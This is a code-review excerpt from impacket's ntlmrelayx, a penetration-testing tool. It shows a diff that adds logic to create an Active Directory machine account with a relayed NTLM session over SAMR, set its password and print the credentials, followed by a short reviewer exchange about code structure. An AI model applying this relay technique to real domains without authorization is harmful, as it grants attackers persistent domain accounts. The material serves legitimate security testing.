impacket/examples/ntlmrelayx/attacks/smbattack.py

```diff
@@ -65,55 +68,125 @@ def run(self):
+                    except samr.DCERPCSessionError as e:
+                        if e.error_code == 0xc0000022:
+                            raise Exception("Relayed user doesn't have right to create a machine account!")
+                        elif e.error_code == 0xc00002e7:
+                            raise Exception("Relayed user machine quota exceeded!")
+                        elif e.error_code == 0xc0000062:
+                            raise Exception("Account name not accepted, maybe the '$' at the end is missing ?")
+                        else:
+                            raise e
+
+                    # Account password setup. In the NTLM relay situation it is not possible to use 'hSamrSetPasswordInternal4New()' because an error for "STATUS_WRONG_PASSWORD" is raised
+                    # For the moment, I'm not sure why this error is raised even with the "USER_FORCE_PASSWORD_CHANGE" access mask during a relay. Probably an encryption issue
+                    # However, with 'hSamrChangePasswordUser()' it seems to work by specifying the "old HashNT" which is the default "blank" password hash
+                    if (not self.config.addComputerSMB or len(self.config.addComputerSMB) < 2):
+                        newPassword = ''.join(random.choice(string.ascii_letters + string.digits + '.,;:!$-_+/*(){}#@<>^') for _ in range(15))
+                    else:
+                        newPassword = self.config.addComputerSMB[1]
+                    try:
+                        userHandle = createUser['UserHandle']
+                        samr.hSamrChangePasswordUser(remoteOps.getSamr(), userHandle, oldPassword='', newPassword=newPassword, oldPwdHashNT="31d6cfe0d16ae931b73c59d7e0c089c0",
+                                                    newPwdHashLM='', newPwdHashNT='')
+                    except Exception as e:
+                        LOG.error("Error with password setup:\n" + str(e))
+
+                    # Still from addComputer.py
+                    checkForUser = samr.hSamrLookupNamesInDomain(remoteOps.getSamr(), remoteOps.getDomainHandle(), [computerName])
+                    userRID = checkForUser['RelativeIds']['Element'][0]
+                    openUser = samr.hSamrOpenUser(remoteOps.getSamr(), remoteOps.getDomainHandle(), samr.MAXIMUM_ALLOWED, userRID)
+                    userHandle = openUser['UserHandle']
+                    req = samr.SAMPR_USER_INFO_BUFFER()
+                    req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
+                    req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
+                    samr.hSamrSetInformationUser2(remoteOps.getSamr(), userHandle, req)
+                    print("Successfully added machine account %s with password %s" % (computerName, newPassword))
```

Comment:
Same, maybe this can be abstracted in `samr`

Reply:
Hum for this one I'm not really sure. These actions are specific to the context and I'm not sure that is the goal of the samr library to abstract this ?